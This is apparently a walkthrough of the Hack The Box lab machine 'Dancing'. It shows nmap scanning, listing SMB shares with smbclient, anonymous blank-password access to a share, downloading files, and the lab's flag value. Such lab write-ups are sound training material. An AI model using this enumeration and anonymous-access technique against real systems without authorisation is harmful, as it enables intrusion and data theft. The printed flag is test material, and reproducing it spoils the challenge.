Hack The Box starting point, tier 0, very easy, #3 machine: Dancing. Lets’ go!
TASK 1
What does 3-letter acronym SMB stand for?
Server Message BlockSMB protocol implements an application-layer network protocol used to access resources on a server, such as file shares and shared printers.
TASK 2
What port does SMB use to operate at?
445When I researched about SMB, I found that SMB uses either IP port 139 or 445.
Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an old transport layer that allows Windows computers to talk to each other on the same network. Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
TASK 3
what is the service name for port 445 that came up in our Nmap scan?
microsoft-ds 1┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
2└──╼ [★]$ nmap -sC -sV 10.129.1.12
3Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-17 17:42 BST
4Nmap scan report for 10.129.1.12
5Host is up (0.027s latency).
6Not shown: 997 closed tcp ports (conn-refused)
7PORT STATE SERVICE VERSION
8135/tcp open msrpc Microsoft Windows RPC
9139/tcp open netbios-ssn Microsoft Windows netbios-ssn
10445/tcp open microsoft-ds?
11Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsTASK 4
What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ’list’ the available shares on Dancing?
-L 1┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
2└──╼ [★]$ smbclient --help
3Usage: smbclient [OPTIONS] service <password>
4-M, --message=HOST Send message
5-I, --ip-address=IP Use this IP to connect to
6-E, --stderr Write messages to stderr
7instead of stdout
8-L, --list=HOST Get a list of shares available
9on a host
10-T, --tar=<c|x>IXFvgbNan Command line tar
11-D, --directory=DIR Start from directory
12-c, --command=STRING Execute semicolon separated
13commands
14-b, --send-buffer=BYTES Changes the transmit/send buffer
15-t, --timeout=SECONDS Changes the per-operation
16timeout
17-p, --port=PORT Port to connect to
18-g, --grepable Produce grepable output
19-q, --quiet Suppress help message
20-B, --browse Browse SMB servers using DNSTASK 5
How many shares are there on Dancing?
4 1┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
2└──╼ [★]$ smbclient -L 10.129.1.12
3Password for [WORKGROUP\leewookb]:
4
5 Sharename Type Comment
6 --------- ---- -------
7 ADMIN$ Disk Remote Admin
8 C$ Disk Default share
9 IPC$ IPC Remote IPC
10 WorkShares Disk
11
12SMB1 disabled -- no workgroup availableTASK 6
What is the name of the share we are able to access in the end with a blank password?
WorkSharesRunning the smbclient -L 10.129.1.12 command, we can see that four separate shares are displayed. The default administrative shares often include the $ symbol at the end of their name to indicate they are hidden shares. As we can see that ADMIN$ , C$, IPC$ shares all include the symbol at the end. On the other hand, WorkShares share does not include this symbol, which is an indicator that it is a user-created, or custom, share.
TASK 7
What is the command we can use within the SMB shell to download the files we find?
get1┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
2└──╼ [★]$ smbclient \\\\10.129.1.12\\WorkShares
3Password for [WORKGROUP\leewookb]:
4Try "help" to get a list of possible commands.
5smb: \> ls
6. D 0 Mon Mar 29 09:22:01 2021
7.. D 0 Mon Mar 29 09:22:01 2021
8Amy.J D 0 Mon Mar 29 10:08:24 2021
9James.P D 0 Thu Jun 3 09:38:03 2021In order to connect to the custom share, WorkShares , we need to specify the target’s IP address and the target SMB share. The command is smbclient \\\\{target_IP}\\{target_share}.
- The double backslashes (’\\’) are used to escape the backslashes in the path.
- The path
{target_IP}\\WorkSharesrefers to the “WorkShares” share on the machine identified by ‘{target_IP}’ - We were able to connect to the custom share and I used the command ls to list all of the contents of the directories within the share. The command showed us two directories, one is
Amy.Jand another isJames.P.
1smb: \> cd Amy.J
2smb: \Amy.J\> ls
3. D 0 Mon Mar 29 10:08:24 2021
4.. D 0 Mon Mar 29 10:08:24 2021
5worknotes.txt A 94 Fri Mar 26 11:00:37 2021
6
7
8 5114111 blocks of size 4096. 1733826 blocks available
9
10smb: \Amy.J\> get worknotes.txt
11getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
12smb: \Amy.J\> cd ..
13smb: \> ls
14. D 0 Mon Mar 29 09:22:01 2021
15.. D 0 Mon Mar 29 09:22:01 2021
16Amy.J D 0 Mon Mar 29 10:08:24 2021
17James.P D 0 Thu Jun 3 09:38:03 2021
18
19 5114111 blocks of size 4096. 1733810 blocks available
20
21smb: \> cd James.P\
22smb: \James.P\> ls
23. D 0 Thu Jun 3 09:38:03 2021
24.. D 0 Thu Jun 3 09:38:03 2021
25flag.txt A 32 Mon Mar 29 10:26:57 2021
26
27 5114111 blocks of size 4096. 1733785 blocks available
28
29smb: \James.P\> get flag.txt
30getting file \James.P\flag.txt of size 32 as flag.txt (0.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
31smb: \James.P\>I used cd command to visit Amy.J folder and found ‘worknotes.txt’ file, which we can download using the get command. Also we moved inside the James.P directory as well and downloaded the flag.txt file.
1smb: \James.P\> quit
2┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
3└──╼ [★]$ ls
4Desktop flag.txt IXFvgbNan my_data Templates worknotes.txt
5┌─[us-starting-point-vip-1-dhcp]─[10.10.14.27]─[leewookb@htb-bozzgppq95]─[~]
6└──╼ [★]$ cat flag.txt
75f61c10dffbc77a704d76016a22f1664Since we got everything we needed from the share, we can exit out of the SMB server and the files we downloaded are saved inside the location where we ran our smbclient command from.
SUBMIT FLAG
submit root flag
5f61c10dffbc77a704d76016a22f1664